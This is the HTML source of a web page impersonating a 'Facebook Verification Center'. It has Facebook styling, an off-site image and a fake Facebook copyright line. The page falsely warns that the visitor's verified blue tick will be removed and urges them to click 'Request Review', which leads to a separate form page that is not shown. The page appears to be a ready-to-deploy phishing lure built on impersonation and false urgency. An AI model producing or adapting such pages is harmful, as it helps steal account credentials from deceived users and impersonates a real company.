<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Urgent: Action Required</title>
    <style>
        html,
        body {
            font-family: 'Helvetica Neue', sans-serif;
            height: 100%;
            margin: 0;
            background-color: #F0F2F5;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .container {
            background-color: #FFFFFF;
            max-width: 600px;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.1);
            text-align: center;
        }

        .header {
            display: flex;
            align-items: center;
            margin-bottom: 20px;
        }

        .header img {
            border-radius: 50%;
            width: 60px;
            height: 60px;
            margin-right: 20px;
        }

        .header h1 {
            font-size: 24px;
            color: #1877F2;
            margin: 0;
        }

        h2 {
            font-size: 20px;
            font-weight: normal;
            color: #333333;
            margin-top: 0;
        }

        .action-button {
            background-color: #1877F2;
            color: #FFFFFF;
            border: none;
            border-radius: 24px;
            padding: 12px 24px;
            font-size: 16px;
            cursor: pointer;
            text-decoration: none;
            display: inline-block;
            margin-top: 20px;
        }

        .action-button:hover {
            background-color: #145db2;
        }

        .warning-text {
            font-size: 16px;
            color: #FF0000;
            margin-top: 20px;
        }

        .footer {
            font-size: 14px;
            color: #666666;
            margin-top: 30px;
        }

        .footer p {
            margin: 0;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="header">
            <img src="https://start-page.buffer.com/cdn-cgi/image/width=160,height=160/https://buffer-start-page-uploads.s3.amazonaws.com/64ba02bf0bdad5af3d36ecc4/1689912173000.357377512_115029578309177_3251707807950312193_n.jpg" alt="Facebook Appeal">
            <h1>Facebook Verification Center</h1>
        </div>
        <h2>Your account is at risk of losing its verified blue tick.</h2>
        <p>It seems that your page is not fully compliant with our community standards. Please review your account to avoid losing your verification status.</p>
        <a href="form.html" class="action-button" target="_blank" rel="noopener noreferrer">Request Review</a>
        <p class="warning-text">Failure to act now may result in the removal of your blue tick.</p>
        <div class="footer">
            <p>© 2024 Facebook, Inc. All rights reserved.</p>
        </div>
    </div>
</body>

</html>
